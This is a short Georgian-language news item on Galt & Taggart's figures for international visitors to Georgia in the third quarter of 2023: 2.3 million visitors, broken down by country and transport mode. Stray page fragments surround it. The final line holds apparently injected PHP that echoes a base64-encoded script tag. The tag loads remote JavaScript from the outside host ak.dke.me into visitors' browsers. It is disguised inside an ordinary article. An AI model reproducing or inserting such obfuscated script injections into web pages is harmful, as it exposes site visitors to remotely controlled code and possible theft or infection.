celsiusi
ავერსი შნაიდერი

2023 წლის მე-3 კვარტალში საერთაშორისო ვიზიტორები (ჯამურად ტურისტული და ერთდღიანი ვიზიტები) საქართველოში წლიურად 21.0%-ით გაიზარდა და 2.3 მლნ მოგზაური შეადგინა, - აღნიშნულია Galt & Taggart- ის მიერ გამოყვეყნებულ მიმოხილვაში.

აღნიშნული ზრდა ძირითადად ტურისტული ვიზიტების 15.4%-იანმა ზრდამ განაპირობა (1.73 მლნ ტურისტი, 75.0% მთლიან ვიზიტებში), რასაც მოჰყვება ერთდღიანი ვიზიტები (+41.6% წ/წ). ყველაზე მეტი ვიზიტორი შემოვიდა რუსეთიდან (24.9% წილი ჯამურ ვიზიტებში), თურქეთიდან (21.7% წილი) და სომხეთიდან (14.7% წილი). ვიზიტორთა უმრავლესობა საქართველოში შემოვიდა საავტომობილო ტრანსპორტით (69.2%-იანი წილი), რასაც მოსდევს საჰაერო გზით შემოსვლა (29.8%-იანი წილი). 

ჯამურად, 2023 წლის იანვარ-სექტემბერში საქართველომ 4.8 მლნ მოგზაურს უმასპინძლა, საიდანაც ტურისტული ვიზიტები იყო 3.7 მლნ (2019 წლის იანვარ-სექტემბრის 91.6%), ხოლო ერთდღიანმა ვიზიტებმა 1.2 მლნ შეადგინა, რაც 2019 წლის იანვარ-სექტემბრის 58.9%-ია (დაბალი აღდგენა იხსნება აზერბაიჯანის მიერ საზღვრის კვეთის შეზღუდვებით).

455
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");